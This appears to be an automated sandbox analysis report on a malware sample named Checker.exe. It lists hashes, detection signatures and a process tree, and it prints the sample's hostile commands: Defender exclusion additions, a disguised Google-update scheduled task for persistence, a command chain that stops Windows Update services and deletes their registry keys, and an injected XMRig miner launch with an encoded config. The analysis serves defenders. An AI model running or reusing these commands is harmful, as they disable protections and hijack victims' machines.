Overview
overview
10Static
static
7Checker.exe
windows7-x64
10Checker.exe
windows10-2004-x64
10LiveCharts.xml
windows7-x64
1LiveCharts.xml
windows10-2004-x64
1LiveCharts...es.dll
windows7-x64
3LiveCharts...es.dll
windows10-2004-x64
3LiveChartsRegion.dll
windows7-x64
3LiveChartsRegion.dll
windows10-2004-x64
3MetroSet UI.dll
windows7-x64
1MetroSet UI.dll
windows10-2004-x64
5NAudio.dll
windows7-x64
1NAudio.dll
windows10-2004-x64
1System.IO....le.dll
windows7-x64
1System.IO....le.dll
windows10-2004-x64
1System.IO....on.dll
windows7-x64
1System.IO....on.dll
windows10-2004-x64
1Vip.Notification.dll
windows7-x64
1Vip.Notification.dll
windows10-2004-x64
1WinMM.Net.dll
windows7-x64
1WinMM.Net.dll
windows10-2004-x64
1World.xml
windows7-x64
1World.xml
windows10-2004-x64
1postproc-54.dll
windows7-x64
1postproc-54.dll
windows10-2004-x64
1swresample-2.dll
windows7-x64
1swresample-2.dll
windows10-2004-x64
1swscale-4.dll
windows7-x64
1swscale-4.dll
windows10-2004-x64
1Analysis
-
max time kernel
167s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230705-en -
resource tags
arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system -
submitted
06/07/2023, 10:44
Behavioral task
behavioral1
Sample
Checker.exe
Resource
win7-20230705-en
Behavioral task
behavioral2
Sample
Checker.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
LiveCharts.xml
Resource
win7-20230703-en
Behavioral task
behavioral4
Sample
LiveCharts.xml
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
LiveChartsCountries.dll
Resource
win7-20230703-en
Behavioral task
behavioral6
Sample
LiveChartsCountries.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
LiveChartsRegion.dll
Resource
win7-20230705-en
Behavioral task
behavioral8
Sample
LiveChartsRegion.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral9
Sample
MetroSet UI.dll
Resource
win7-20230703-en
Behavioral task
behavioral10
Sample
MetroSet UI.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral11
Sample
NAudio.dll
Resource
win7-20230703-en
Behavioral task
behavioral12
Sample
NAudio.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral13
Sample
System.IO.Compression.ZipFile.dll
Resource
win7-20230703-en
Behavioral task
behavioral14
Sample
System.IO.Compression.ZipFile.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral15
Sample
System.IO.Compression.dll
Resource
win7-20230703-en
Behavioral task
behavioral16
Sample
System.IO.Compression.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral17
Sample
Vip.Notification.dll
Resource
win7-20230703-en
Behavioral task
behavioral18
Sample
Vip.Notification.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral19
Sample
WinMM.Net.dll
Resource
win7-20230703-en
Behavioral task
behavioral20
Sample
WinMM.Net.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral21
Sample
World.xml
Resource
win7-20230703-en
Behavioral task
behavioral22
Sample
World.xml
Resource
win10v2004-20230703-en
Behavioral task
behavioral23
Sample
postproc-54.dll
Resource
win7-20230703-en
Behavioral task
behavioral24
Sample
postproc-54.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral25
Sample
swresample-2.dll
Resource
win7-20230703-en
Behavioral task
behavioral26
Sample
swresample-2.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral27
Sample
swscale-4.dll
Resource
win7-20230703-en
Behavioral task
behavioral28
Sample
swscale-4.dll
Resource
win10v2004-20230703-en
General
-
Target
Checker.exe
-
Size
53.0MB
-
MD5
57afcb97e60f92e2fe43d869d5a432d5
-
SHA1
b29668c32b353efdcab5aa367f761e1f1682ea91
-
SHA256
7c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
-
SHA512
70e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
-
SSDEEP
786432:PqwfGQxHq+2QrViNeZO4pc+rN15CDL+jAvgRdsFSFo0NV:guVt44p1nsn+jAvgRdsMFoS
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 3064 created 1196 3064 Checker.exe 13 PID 3064 created 1196 3064 Checker.exe 13 PID 3064 created 1196 3064 Checker.exe 13 PID 3064 created 1196 3064 Checker.exe 13 PID 2520 created 1196 2520 updater.exe 13 PID 2520 created 1196 2520 updater.exe 13 PID 2520 created 1196 2520 updater.exe 13 PID 2520 created 1196 2520 updater.exe 13 PID 2456 created 1196 2456 conhost.exe 13 PID 2520 created 1196 2520 updater.exe 13 PID 2520 created 1196 2520 updater.exe 13 -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/904-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/904-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2520 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2880 taskeng.exe -
resource yara_rule behavioral1/memory/904-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/904-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2520 set thread context of 2456 2520 updater.exe 66 PID 2520 set thread context of 904 2520 updater.exe 73 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe Checker.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1528 sc.exe 2092 sc.exe 1388 sc.exe 2572 sc.exe 2596 sc.exe 1628 sc.exe 1684 sc.exe 560 sc.exe 2436 sc.exe 2576 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2812 schtasks.exe 2532 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2140 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50538e55f7afd901 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3064 Checker.exe 3064 Checker.exe 2308 powershell.exe 3064 Checker.exe 3064 Checker.exe 3064 Checker.exe 3064 Checker.exe 936 powershell.exe 3064 Checker.exe 3064 Checker.exe 2896 powershell.exe 2520 updater.exe 2520 updater.exe 2632 powershell.exe 2520 updater.exe 2520 updater.exe 2520 updater.exe 2520 updater.exe 2612 powershell.exe 2520 updater.exe 2520 updater.exe 2456 conhost.exe 2456 conhost.exe 2520 updater.exe 2520 updater.exe 2520 updater.exe 2520 updater.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe 904 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2140 WMIC.exe Token: SeIncreaseQuotaPrivilege 2140 WMIC.exe Token: SeSecurityPrivilege 2140 WMIC.exe Token: SeTakeOwnershipPrivilege 2140 WMIC.exe Token: SeLoadDriverPrivilege 2140 WMIC.exe Token: SeSystemtimePrivilege 2140 WMIC.exe Token: SeBackupPrivilege 2140 WMIC.exe Token: SeRestorePrivilege 2140 WMIC.exe Token: SeShutdownPrivilege 2140 WMIC.exe Token: SeSystemEnvironmentPrivilege 2140 WMIC.exe Token: SeUndockPrivilege 2140 WMIC.exe Token: SeManageVolumePrivilege 2140 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2140 WMIC.exe Token: SeIncreaseQuotaPrivilege 2140 WMIC.exe Token: SeSecurityPrivilege 2140 WMIC.exe Token: SeTakeOwnershipPrivilege 2140 WMIC.exe Token: SeLoadDriverPrivilege 2140 WMIC.exe Token: SeSystemtimePrivilege 2140 WMIC.exe Token: SeBackupPrivilege 2140 WMIC.exe Token: SeRestorePrivilege 2140 WMIC.exe Token: SeShutdownPrivilege 2140 WMIC.exe Token: SeSystemEnvironmentPrivilege 2140 WMIC.exe Token: SeUndockPrivilege 2140 WMIC.exe Token: SeManageVolumePrivilege 2140 WMIC.exe Token: SeLockMemoryPrivilege 904 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1800 wrote to memory of 1628 1800 cmd.exe 33 PID 1800 wrote to memory of 1628 1800 cmd.exe 33 PID 1800 wrote to memory of 1628 1800 cmd.exe 33 PID 1800 wrote to memory of 1528 1800 cmd.exe 34 PID 1800 wrote to memory of 1528 1800 cmd.exe 34 PID 1800 wrote to memory of 1528 1800 cmd.exe 34 PID 1800 wrote to memory of 1684 1800 cmd.exe 35 PID 1800 wrote to memory of 1684 1800 cmd.exe 35 PID 1800 wrote to memory of 1684 1800 cmd.exe 35 PID 1800 wrote to memory of 2092 1800 cmd.exe 36 PID 1800 wrote to memory of 2092 1800 cmd.exe 36 PID 1800 wrote to memory of 2092 1800 cmd.exe 36 PID 1800 wrote to memory of 560 1800 cmd.exe 37 PID 1800 wrote to memory of 560 1800 cmd.exe 37 PID 1800 wrote to memory of 560 1800 cmd.exe 37 PID 1800 wrote to memory of 272 1800 cmd.exe 38 PID 1800 wrote to memory of 272 1800 cmd.exe 38 PID 1800 wrote to memory of 272 1800 cmd.exe 38 PID 1800 wrote to memory of 2060 1800 cmd.exe 39 PID 1800 wrote to memory of 2060 1800 cmd.exe 39 PID 1800 wrote to memory of 2060 1800 cmd.exe 39 PID 1800 wrote to memory of 2780 1800 cmd.exe 40 PID 1800 wrote to memory of 2780 1800 cmd.exe 40 PID 1800 wrote to memory of 2780 1800 cmd.exe 40 PID 1800 wrote to memory of 2760 1800 cmd.exe 41 PID 1800 wrote to memory of 2760 1800 cmd.exe 41 PID 1800 wrote to memory of 2760 1800 cmd.exe 41 PID 1800 wrote to memory of 2676 1800 cmd.exe 42 PID 1800 wrote to memory of 2676 1800 cmd.exe 42 PID 1800 wrote to memory of 2676 1800 cmd.exe 42 PID 936 wrote to memory of 2812 936 powershell.exe 43 PID 936 wrote to memory of 2812 936 powershell.exe 43 PID 936 wrote to memory of 2812 936 powershell.exe 43 PID 2896 wrote to memory of 3032 2896 powershell.exe 46 PID 2896 wrote to memory of 3032 2896 powershell.exe 46 PID 2896 wrote to memory of 3032 2896 powershell.exe 46 PID 2880 wrote to memory of 2520 2880 taskeng.exe 48 PID 2880 wrote to memory of 2520 2880 taskeng.exe 48 PID 2880 wrote to memory of 2520 2880 taskeng.exe 48 PID 2616 wrote to memory of 1388 2616 cmd.exe 55 PID 2616 wrote to memory of 1388 2616 cmd.exe 55 PID 2616 wrote to memory of 1388 2616 cmd.exe 55 PID 2616 wrote to memory of 2572 2616 cmd.exe 56 PID 2616 wrote to memory of 2572 2616 cmd.exe 56 PID 2616 wrote to memory of 2572 2616 cmd.exe 56 PID 2616 wrote to memory of 2436 2616 cmd.exe 57 PID 2616 wrote to memory of 2436 2616 cmd.exe 57 PID 2616 wrote to memory of 2436 2616 cmd.exe 57 PID 2616 wrote to memory of 2576 2616 cmd.exe 58 PID 2616 wrote to memory of 2576 2616 cmd.exe 58 PID 2616 wrote to memory of 2576 2616 cmd.exe 58 PID 2616 wrote to memory of 2596 2616 cmd.exe 59 PID 2616 wrote to memory of 2596 2616 cmd.exe 59 PID 2616 wrote to memory of 2596 2616 cmd.exe 59 PID 2616 wrote to memory of 2416 2616 cmd.exe 60 PID 2616 wrote to memory of 2416 2616 cmd.exe 60 PID 2616 wrote to memory of 2416 2616 cmd.exe 60 PID 2616 wrote to memory of 2424 2616 cmd.exe 61 PID 2616 wrote to memory of 2424 2616 cmd.exe 61 PID 2616 wrote to memory of 2424 2616 cmd.exe 61 PID 2616 wrote to memory of 2432 2616 cmd.exe 62 PID 2616 wrote to memory of 2432 2616 cmd.exe 62 PID 2616 wrote to memory of 2432 2616 cmd.exe 62 PID 2616 wrote to memory of 2444 2616 cmd.exe 63 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\Checker.exe"C:\Users\Admin\AppData\Local\Temp\Checker.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rosbrqmf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2812
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1628
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1528
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2092
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:560
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:272
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2060
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2780
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2760
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jcwit#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3032
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rosbrqmf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2532
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1388
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2572
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2436
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2416
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2424
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2432
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2444
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2476
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe rkostbomswpysz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2456
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2324
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1184 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe lpvrtgaoraybnvjp 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeMR2zIsa2YhX3HvrJ76L3PYAw7qlLpJBbIeCTNKBaLPSykUvzekO7koObVh69XukHNmYf5W8bMDaMPHDBhALjxm6ziWFUO9JHrnjNDYz4TjXjDaYA24sYnWlUXH83ZDmapbvZr3aqfKfyG9nx4moeRNlWj2lCejFqkaCPIieIWBnpkI3QbS0BzxviXA/4GRSKOWNHKn1bm7X3fdig6VZbCjqyzHehh8LEsH5QnzNW7X1zr4wsp4wmti6JKB2Z96l0RN9iP9PutKKsk+KJv1YK7cQAIwLotcd2/KqbIHXAW6N6liCNwugSW24ESXQmTzPxdnoYjZr2hpHGhqvVe54HraR7se9rJ/j7PQ+9BChih6hZJgcUrwa1KkW1gkRPN5dNRlmr7HMPGYgY695nz/U05zjCKr1NrGSmx9TSWA5uF+g=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8EFAD100-F4D0-4D2E-826E-1A1BF5665DB2} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2520
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53.0MB
MD557afcb97e60f92e2fe43d869d5a432d5
SHA1b29668c32b353efdcab5aa367f761e1f1682ea91
SHA2567c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
SHA51270e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
-
Filesize
53.0MB
MD557afcb97e60f92e2fe43d869d5a432d5
SHA1b29668c32b353efdcab5aa367f761e1f1682ea91
SHA2567c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
SHA51270e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD599b15bdc4b063a870d3970cbfd0317bc
SHA1a6edce14bb166fd08c506589b34ed95501a96983
SHA2568dc357215c985f610b85a3a09f32d1b97d5f93ab5fecc7c07b0fa8bff19c3611
SHA51203e6b61d2999616ab270f5a5e27b690d90884eb59387e805f7e8ab80e97fa988d5bfc1dcbf531daae5a037ade1d1932221fee8d73819b1e1e438788e9d66f4b8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD599b15bdc4b063a870d3970cbfd0317bc
SHA1a6edce14bb166fd08c506589b34ed95501a96983
SHA2568dc357215c985f610b85a3a09f32d1b97d5f93ab5fecc7c07b0fa8bff19c3611
SHA51203e6b61d2999616ab270f5a5e27b690d90884eb59387e805f7e8ab80e97fa988d5bfc1dcbf531daae5a037ade1d1932221fee8d73819b1e1e438788e9d66f4b8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EENX0Y5U3GSC755JCU8L.temp
Filesize7KB
MD599b15bdc4b063a870d3970cbfd0317bc
